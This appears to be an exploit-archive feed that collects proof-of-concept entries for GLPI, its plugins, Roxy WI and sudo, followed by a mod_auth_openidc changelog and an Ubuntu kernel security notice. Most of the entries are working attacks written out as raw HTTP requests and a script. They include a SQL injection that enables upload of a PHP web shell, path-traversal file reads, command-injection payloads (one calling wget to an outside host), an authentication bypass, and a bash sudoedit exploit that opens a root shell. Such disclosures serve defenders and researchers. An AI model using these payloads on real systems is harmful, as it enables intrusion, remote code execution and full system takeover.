GLPI versions 10.0.0 through 10.0.2 suffer from a remote SQL injection vulnerability that can lead to remote code execution.

    # ADVISORY INFORMATION# Exploit Title: GLPI  v10.0.2 - SQL Injection (Authentication Depends on Configuration)# Date of found: 11 Jun 2022# Application: GLPI >=10.0.0, < 10.0.3# Author: Nuri Çilengir # Vendor Homepage: https://glpi-project.org/# Software Link: https://github.com/glpi-project/glpi# Advisory: https://pentest.blog/advisory-glpi-service-management-software-sql-injection-remote-code-execution-and-local-file-inclusion/# Tested on: Ubuntu 22.04# CVE: CVE-2022-31056# PoCPOST /front/change.form.php HTTP/1.1Host: acme.comUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:100.0) Gecko/20100101 Firefox/100.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Content-Type: multipart/form-data; boundary=---------------------------190705055020145329172298897156Content-Length: 4836Cookie: glpi_8ac3914e6055f1dc4d1023c9bbf5ce82_rememberme=%5B2%2C%22wSQx0155YofQn53WMozDGuSI1p2KAzxZ392stmrX%22%5D; glpi_8ac3914e6055f1dc4d1023c9bbf5ce82=f3cciacap6rqs2bcoaio5lmikg-----------------------------190705055020145329172298897156Content-Disposition: form-data; name="id"0-----------------------------190705055020145329172298897156Content-Disposition: form-data; name="_glpi_csrf_token"752d2ff606bf360d809b682f0d9da9c23b290b31453f493f4924e16e77bbba35-----------------------------190705055020145329172298897156Content-Disposition: form-data; name="_actors"{"requester":[],"observer":[],"assign":[{"itemtype":"User","items_id":"2','2',); INSERT INTO `glpi_documenttypes` (`name`, `ext`, `icon`, `mime`, `is_uploadable`) VALUES('PHP', 'php', 'jpg-dist.png', 'application/x-php', 1); ---'","use_notification":"1","alternative_email":""}]}-----------------------------190705055020145329172298897156--If you manipulate the filename uploaded to the system, the file is placed under /files/_tmp/. HTTP GET request required to trigger the issue is as follows.POST /ajax/fileupload.php HTTP/1.1Host: 192.168.56.113User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:100.0) Gecko/20100101 Firefox/100.0Accept: application/json, text/javascript, */*; q=0.01Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateX-Glpi-Csrf-Token: bb1c7f6cd4c1865838b234b4f703172a57c19c276d11eb322936d770d75c6dd7X-Requested-With: XMLHttpRequestContent-Type: multipart/form-data; boundary=---------------------------102822935214007887302871396841Content-Length: 559Origin: http://acme.comCookie: glpi_8ac3914e6055f1dc4d1023c9bbf5ce82_rememberme=%5B2%2C%22wSQx0155YofQn53WMozDGuSI1p2KAzxZ392stmrX%22%5D; glpi_8ac3914e6055f1dc4d1023c9bbf5ce82=f3cciacap6rqs2bcoaio5lmikg-----------------------------102822935214007887302871396841Content-Disposition: form-data; name="name"_uploader_filename-----------------------------102822935214007887302871396841Content-Disposition: form-data; name="showfilesize"1-----------------------------102822935214007887302871396841Content-Disposition: form-data; name="_uploader_filename[]"; filename="test.php"Content-Type: application/x-phpOutput:  <?php echo system($_GET['cmd']); ?>-----------------------------102822935214007887302871396841--# POC URLhttp://192.168.56.113/files/_tmp/poc.php?cmd=

GLPI 10.0.2 SQL Injection / Remote Code Execution

GLPI Activity versions prior to 3.1.0 suffer from a local file inclusion vulnerability.

    # Exploit Title: GLPI Activity  v3.1.0 - Authenticated Local File Inclusion on Activity plugin# Date of found: 11 Jun 2022# Application: GLPI Activity < 3.1.0# Author: Nuri Çilengir # Vendor Homepage: https://glpi-project.org/# Software Link: https://github.com/InfotelGLPI/activity# Advisory: https://pentest.blog/advisory-glpi-service-management-software-sql-injection-remote-code-execution-and-local-file-inclusion/# Tested on: Ubuntu 22.04# CVE : CVE-2022-34125# PoCGET /marketplace/activity/front/cra.send.php?&file=../../\\..\\..\\..\\..\\..\\..\\..\\Windows\\System32\\drivers\\etc\\hosts&seefile=1 HTTP/1.1Host: 192.168.56.113User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:100.0) Gecko/20100101 Firefox/100.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: close

GLPI Activity Local File Inclusion

GLPI Glpiinventory versions 1.0.1 and below suffer from a local file inclusion vulnerability.

    # ADVISORY INFORMATION# Exploit Title: GLPI Glpiinventory v1.0.1 - Unauthenticated Local File Inclusion  # Date of found: 11 Jun 2022# Application: GLPI Glpiinventory <= 1.0.1# Author: Nuri Çilengir # Vendor Homepage: https://glpi-project.org/# Software Link: https://github.com/glpi-project/glpi-inventory-plugin# Advisory: https://pentest.blog/advisory-glpi-service-management-software-sql-injection-remote-code-execution-and-local-file-inclusion/# Tested on: Ubuntu 22.04# CVE: CVE-2022-31062# PoCPOST /marketplace/glpiinventory/b/deploy/index.php?action=getFilePart&file=../../\\..\\..\\..\\..\\System32\\drivers\\etc\\hosts&version=1 HTTP/1.1Host: 192.168.56.113User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:100.0) Gecko/20100101 Firefox/100.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: closeUpgrade-Insecure-Requests: 1

GLPI Glpiinventory 1.0.1 Local File Inclusion

GLPI Manageentities versions prior to 4.0.2 suffer from a local file inclusion vulnerability.

    # ADVISORY INFORMATION# Exploit Title: GLPI 4.0.2 - Unauthenticated Local File Inclusion on Manageentities plugin# Date of found: 11 Jun 2022# Application: GLPI Manageentities < 4.0.2# Author: Nuri Çilengir # Vendor Homepage: https://glpi-project.org/# Software Link: https://github.com/InfotelGLPI/manageentities# Advisory: https://pentest.blog/advisory-glpi-service-management-software-sql-injection-remote-code-execution-and-local-file-inclusion/# Tested on: Ubuntu 22.04# CVE : CVE-2022-34127# PoCGET /marketplace/manageentities/inc/cri.class.php?&file=../../\\..\\..\\..\\..\\..\\..\\..\\Windows\\System32\\drivers\\etc\\hosts&seefile=1 HTTP/1.1Host: 192.168.56.113User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:100.0) Gecko/20100101 Firefox/100.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: closeUpgrade-Insecure-Requests: 1

GLPI Manageentities Local File Inclusion

Roxy WI version 6.1.1.0 suffers from an unauthenticated remote code execution vulnerability.

    # ADVISORY INFORMATION# Exploit Title: Roxy WI v6.1.1.0 - Unauthenticated Remote Code Execution (RCE) via ssl_cert Upload# Date of found: 21 July 2022# Application: Roxy WI <= v6.1.1.0# Author: Nuri Çilengir # Vendor Homepage: https://roxy-wi.org# Software Link: https://github.com/hap-wi/roxy-wi.git# Advisory: https://pentest.blog/advisory-roxy-wi-unauthenticated-remote-code-executions-cve-2022-31137# Tested on: Ubuntu 22.04# CVE : CVE-2022-31161# PoCPOST /app/options.py HTTP/1.1Host: 192.168.56.116User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:101.0) Gecko/20100101 Firefox/101.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestContent-Length: 123Origin: https://192.168.56.116Referer: https://192.168.56.116/app/login.pyConnection: closeshow_versions=1&token=&alert_consumer=notNull&serv=127.0.0.1&delcert=a%20&%20wget%20<id>.oastify.com;

Roxy WI 6.1.1.0 Remote Code Execution

Roxy WI version 6.1.0.0 suffers from an unauthenticated remote code execution vulnerability.

    # ADVISORY INFORMATION# Exploit Title: Roxy WI v6.1.0.0 - Unauthenticated Remote Code Execution (RCE)# Date of found: 21 July 2022# Application: Roxy WI <= v6.1.0.0# Author: Nuri Çilengir # Vendor Homepage: https://roxy-wi.org# Software Link: https://github.com/hap-wi/roxy-wi.git# Advisory: https://pentest.blog/advisory-roxy-wi-unauthenticated-remote-code-executions-cve-2022-31137# Tested on: Ubuntu 22.04# CVE : CVE-2022-31126# PoCPOST /app/options.py HTTP/1.1Host: 192.168.56.116User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:101.0) Gecko/20100101 Firefox/101.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestContent-Length: 73Origin: https://192.168.56.116Referer: https://192.168.56.116/app/login.pyConnection: closeshow_versions=1&token=&alert_consumer=1&serv=127.0.0.1&getcert=;id;

Roxy WI 6.1.0.0 Remote Code Execution

Roxy WI version 6.1.0.0 suffers from an improper authentication control vulnerability.

    # Exploit Title: Roxy WI v6.1.0.0 - Improper Authentication Control# Date of found: 21 July 2022# Application: Roxy WI <= v6.1.0.0# Author: Nuri Çilengir# Vendor Homepage: https://roxy-wi.org# Software Link: https://github.com/hap-wi/roxy-wi.git# Advisory: https://pentest.blog/advisory-roxy-wi-unauthenticated-remote-code-executions-cve-2022-31137# Tested on: Ubuntu 22.04# CVE : CVE-2022-31125# PoCPOST /app/options.py HTTP/1.1Host: 192.168.56.116User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:101.0) Gecko/20100101 Firefox/101.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestContent-Length: 105Origin: https://192.168.56.114Dnt: 1Referer: https://192.168.56.114/app/login.pySec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: same-originTe: trailersConnection: closealert_consumer=notNull&serv=roxy-wi.access.log&rows1=10&grep=&exgrep=&hour=00&minut=00&hour1=23&minut1=45

Roxy WI 6.1.0.0 Improper Authentication Control 

sudo versions 1.8.0 through 1.9.12p1 local privilege escalation exploit.

    #!/usr/bin/env bash# Exploit Title: sudo 1.8.0 to 1.9.12p1 - Privilege Escalation# Exploit Author: n3m1.sys# CVE: CVE-2023-22809# Date: 2023/01/21# Vendor Homepage: https://www.sudo.ws/# Software Link: https://www.sudo.ws/dist/sudo-1.9.12p1.tar.gz# Version: 1.8.0 to 1.9.12p1# Tested on: Ubuntu Server 22.04 - vim 8.2.4919 - sudo 1.9.9## Git repository: https://github.com/n3m1dotsys/CVE-2023-22809-sudoedit-privesc## Running this exploit on a vulnerable system allows a localiattacker to gain # a root shell on the machine.## The exploit checks if the current user has privileges to run sudoedit or # sudo -e on a file as root. If so it will open the sudoers file for the# attacker to add a line to gain privileges on all the files and get a root # shell.if ! sudo --version | head -1 | grep -qE '(1\.8.*|1\.9\.[0-9]1?(p[1-3])?|1\.9\.12p1)$'then    echo "> Currently installed sudo version is not vulnerable"    exit 1fiEXPLOITABLE=$(sudo -l | grep -E "sudoedit|sudo -e" | grep -E '$root$|$ALL$|$ALL : ALL$' | cut -d ')' -f 2-)if [ -z "$EXPLOITABLE" ]; then    echo "> It doesn't seem that this user can run sudoedit as root"    read -p "Do you want to proceed anyway? (y/N): " confirm && [[ $confirm == [yY] ]] || exit 2else    echo "> BINGO! User exploitable"    echo "> Opening sudoers file, please add the following line to the file in order to do the privesc:"    echo "$( whoami ) ALL=(ALL:ALL) ALL"    read -n 1 -s -r -p "Press any key to continue..."    EDITOR="vim -- /etc/sudoers" $EXPLOITABLE    sudo su root    exit 0fi

sudo 1.9.12p1 Privilege Escalation

mod_auth_openidc is an authentication and authorization module for the Apache 2.x HTTP server that implements the OpenID Connect Relying Party functionality. In versions 2.0.0 through 2.4.13.1, when `OIDCStripCookies` is set and a crafted cookie supplied, a NULL pointer dereference would occur, resulting in a segmentation fault. This could be used in a Denial-of-Service attack and thus presents an availability risk. Version 2.4.13.2 contains a patch for this issue. As a workaround, avoid using `OIDCStripCookies`.

1.  Releases
2.  v2.4.13.2

**Security**

*   CVE-2023-28625: prevent core dump when OIDCStripCookies is set and a crafted Cookie header is supplied  
    GHSA-f5xw-rvfr-24qr
*   fix code scanning alerts from 2 code scanning tools all over the place

**Features**

*   add support for Elliptic Curve signing/encryption keys in addtiion to RSA keys,  
    i.e. client keys configured in OIDCPrivateKeyFiles/OIDCPublicKeyFiles, published on OIDCClientJwksUri  
    and used in private_key_jwt authentication, encrypted id_token's, request objects/uri's,  
    but also statically configured provider keys in OIDCOAuthVerifyCertFiles and OIDCProviderVerifyCertFiles
*   record authorization errors in environment variable OIDC_AUTHZ_ERROR  
    so its value can be used in logs e.g. with HTTP 401 responses in the access log:  
        LogFormat "%h %l %u %t %U %401{OIDC_AUTHZ_ERROR}e %>s %b" combined  
    also log authorization errors with oidc_debug instead of oidc_info

**Bugfixes**

*   fix for omitting the kid# prefix in OIDCPublicKeyFiles/OIDCPrivateKeyFiles and other certificate configuration primitives when linked against OpenSSL <= 1.0.x
*   allow target_link_uri's without a path in 3rd-party-init SSO with a multi-provider setup
*   correct cookie path printout in error log when target_link_uri does not match OIDCCookiePath

**Commercial**

*   binary packages for various other platforms such as Microsoft Windows 64bit/32bit, Red Hat Enterprise Linux 6, Red Hat Enterprise Linux 7/8 on Power PC (ppc64, ppc64le), Oracle Linux 6/7, older Ubuntu and Debian distro's, Oracle HTTP Server 11.1/12.1/12.2, IBM HTTP Server 8/9, Solaris 11.4, IBM AIX 7.2 and Mac OS X are available under a commercial agreement via sales@openidc.com
*   support for Redis over TLS, Redis (TLS) Sentinel, and Redis (TLS) Cluster is available under a commercial license via sales@openidc.com

CVE-2023-28625: Release release 2.4.13.2 · OpenIDC/mod_auth_openidc

Ubuntu Security Notice 5991-1 - It was discovered that the System V IPC implementation in the Linux kernel did not properly handle large shared memory counts. A local attacker could use this to cause a denial of service. It was discovered that a use-after-free vulnerability existed in the SGI GRU driver in the Linux kernel. A local attacker could possibly use this to cause a denial of service or possibly execute arbitrary code.

==========================================================================  
Ubuntu Security Notice USN-5991-1  
March 31, 2023

linux-gcp-4.15 vulnerabilities  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 18.04 LTS

Summary:

Several security issues were fixed in the Linux kernel.

Software Description:  
- linux-gcp-4.15: Linux kernel for Google Cloud Platform (GCP) systems

Details:

It was discovered that the System V IPC implementation in the Linux kernel  
did not properly handle large shared memory counts. A local attacker could  
use this to cause a denial of service (memory exhaustion). (CVE-2021-3669)

It was discovered that a use-after-free vulnerability existed in the SGI  
GRU driver in the Linux kernel. A local attacker could possibly use this to  
cause a denial of service (system crash) or possibly execute arbitrary  
code. (CVE-2022-3424)

Ziming Zhang discovered that the VMware Virtual GPU DRM driver in the Linux  
kernel contained an out-of-bounds write vulnerability. A local attacker  
could use this to cause a denial of service (system crash).  
(CVE-2022-36280)

Hyunwoo Kim discovered that the DVB Core driver in the Linux kernel did not  
properly perform reference counting in some situations, leading to a use-  
after-free vulnerability. A local attacker could use this to cause a denial  
of service (system crash) or possibly execute arbitrary code.  
(CVE-2022-41218)

It was discovered that the network queuing discipline implementation in the  
Linux kernel contained a null pointer dereference in some situations. A  
local attacker could use this to cause a denial of service (system crash).  
(CVE-2022-47929)

José Oliveira and Rodrigo Branco discovered that the prctl syscall  
implementation in the Linux kernel did not properly protect against  
indirect branch prediction attacks in some situations. A local attacker  
could possibly use this to expose sensitive information. (CVE-2023-0045)

It was discovered that a use-after-free vulnerability existed in the  
Advanced Linux Sound Architecture (ALSA) subsystem. A local attacker could  
use this to cause a denial of service (system crash). (CVE-2023-0266)

Kyle Zeng discovered that the IPv6 implementation in the Linux kernel  
contained a NULL pointer dereference vulnerability in certain situations. A  
local attacker could use this to cause a denial of service (system crash).  
(CVE-2023-0394)

Kyle Zeng discovered that the ATM VC queuing discipline implementation in  
the Linux kernel contained a type confusion vulnerability in some  
situations. An attacker could use this to cause a denial of service (system  
crash). (CVE-2023-23455)

It was discovered that the RNDIS USB driver in the Linux kernel contained  
an integer overflow vulnerability. A local attacker with physical access  
could plug in a malicious USB device to cause a denial of service (system  
crash) or possibly execute arbitrary code. (CVE-2023-23559)

Wei Chen discovered that the DVB USB AZ6027 driver in the Linux kernel  
contained a null pointer dereference when handling certain messages from  
user space. A local attacker could use this to cause a denial of service  
(system crash). (CVE-2023-28328)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 18.04 LTS:  
   linux-image-4.15.0-1147-gcp     4.15.0-1147.163  
   linux-image-gcp-lts-18.04       4.15.0.1147.161

After a standard system update you need to reboot your computer to make  
all the necessary changes.

ATTENTION: Due to an unavoidable ABI change the kernel updates have  
been given a new version number, which requires you to recompile and  
reinstall all third party kernel modules you might have installed.  
Unless you manually uninstalled the standard kernel metapackages  
(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,  
linux-powerpc), a standard system upgrade will automatically perform  
this as well.

References:  
   https://ubuntu.com/security/notices/USN-5991-1  
   CVE-2021-3669, CVE-2022-3424, CVE-2022-36280, CVE-2022-41218,  
   CVE-2022-47929, CVE-2023-0045, CVE-2023-0266, CVE-2023-0394,  
   CVE-2023-23455, CVE-2023-23559, CVE-2023-28328

Package Information:  
   https://launchpad.net/ubuntu/+source/linux-gcp-4.15/4.15.0-1147.163

Tag

#ubuntu